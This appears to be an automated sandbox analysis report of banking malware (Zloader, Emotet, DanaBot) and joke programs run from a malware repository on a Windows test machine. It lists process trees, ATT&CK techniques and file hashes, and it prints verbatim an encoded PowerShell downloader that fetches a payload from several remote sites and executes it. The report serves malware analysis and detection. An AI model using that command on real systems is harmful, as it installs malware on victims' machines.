PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 3560	1216	msedge.exe	86
PID 1216 wrote to memory of 2312	1216	msedge.exe	87
PID 1216 wrote to memory of 2312	1216	msedge.exe	87
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88
PID 1216 wrote to memory of 452	1216	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://youtube.com/@boffy/
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb77bc46f8,0x7ffb77bc4708,0x7ffb77bc4718
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:3560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
  2⤵
  PID:440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:2556
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:3032
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
  2⤵
  PID:332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:2116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:4812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:1560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2284 /prefetch:1
  2⤵
  PID:5152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
  2⤵
  PID:5320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:6056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6856 /prefetch:8
  2⤵
  PID:5348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6560 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,9444861347110493930,3683549308454199849,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1700

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4488

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3768

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x408 0x4a8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:228

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5196

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5592

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Banking-Malware\Zloader.xlsm"
1⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4212
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
  2⤵
  - Process spawned unexpected child process
  PID:1104

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet.zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2760
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5864
- C:\Windows\SysWOW64\regsvr32.exe
  C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.exe@5864
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2116
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\THE-MA~1\THE-MA~1\BANKIN~1\DanaBot.dll,f0
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:5356
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 460
  2⤵
  - Program crash
  PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5864 -ip 5864
1⤵
PID:3996

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3756
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 408
  2⤵
  - Program crash
  PID:5312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3756 -ip 3756
1⤵
PID:5976

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Banking-Malware\DanaBot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1892
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 140
  2⤵
  - Program crash
  PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1892 -ip 1892
1⤵
PID:3904

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:2760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 1556
  2⤵
  - Program crash
  PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2760 -ip 2760
1⤵
PID:2480

C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5700
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 1540
  2⤵
  - Program crash
  PID:2084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5700 -ip 5700
1⤵
PID:5252

C:\Users\Admin\Desktop\Popup.exe
"C:\Users\Admin\Desktop\Popup.exe"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3384

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- System Location Discovery: System Language Discovery
PID:2560

C:\Users\Admin\Desktop\CookieClickerHack.exe
"C:\Users\Admin\Desktop\CookieClickerHack.exe"
1⤵
PID:2996

C:\Users\Admin\Desktop\Vista.exe
"C:\Users\Admin\Desktop\Vista.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:4324

C:\Users\Admin\Desktop\Popup.exe
"C:\Users\Admin\Desktop\Popup.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3468

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x408 0x4a8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Users\Admin\Desktop\WindowsUpdate.exe
"C:\Users\Admin\Desktop\WindowsUpdate.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2816

C:\Users\Admin\Desktop\rickroll.exe
"C:\Users\Admin\Desktop\rickroll.exe"
1⤵
PID:3532

C:\Users\Admin\Desktop\rickroll.exe
"C:\Users\Admin\Desktop\rickroll.exe"
1⤵
PID:5212

C:\Users\Admin\Desktop\rickroll.exe
"C:\Users\Admin\Desktop\rickroll.exe"
1⤵
PID:944

C:\Users\Admin\Desktop\Avoid.exe
"C:\Users\Admin\Desktop\Avoid.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3968

C:\Users\Admin\Desktop\Melting.exe
"C:\Users\Admin\Desktop\Melting.exe"
1⤵
PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\284.exe

Filesize
149KB

MD5
dfb2b4e47b6589b121f13d056208f992

SHA1
f6480ba7e7763615e1fa0b3d8289f22df55d82ec

SHA256
9a3dac72ba3b6afc88e307bd9bae52ae2016bf292ead636ec7b34923e27c8ae5

SHA512
c0b41c9d9bf7c42de17d1784de7b996db8597418cbe42417f706fbd09df3e7d057899cea2d0f737ce74447b04dd76ed70b2aa5d02491168595f64bfeb2393e08

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
471B

MD5
99b0d98114cdf906c7281925f3c9f277

SHA1
aee1e648103f809f37545bae8373beb9f4435c35

SHA256
21828fd85973ad1f2930f0ac029003666368bbd56e6847ba3b777a62b4a985d6

SHA512
d3055ddbf9565992ff84f401513519835f2b726895b200c691589e24cc8b98b765838d2ac0e18b6b4b52aa032ca5b8de782410033d436154cc1cca38e28e0dbf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

Filesize
420B

MD5
9b4a623c2ef42051377a278e342aebb8

SHA1
69050be87c2d2f2162af2dbfdaac6583f311f58c

SHA256
5ab7ffaee5a0af3af56b3ef60dd3cf303e34454df69a77a5a1f7b3bb408ab420

SHA512
ac43fea1a4a4a20f405e0da74a1b814f40538bac7d5d918e96b7afc1807efd4e12a59537fe0ae3ea1f6b5351a61507c51e84aa155ed8e5058539e2380c617c0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
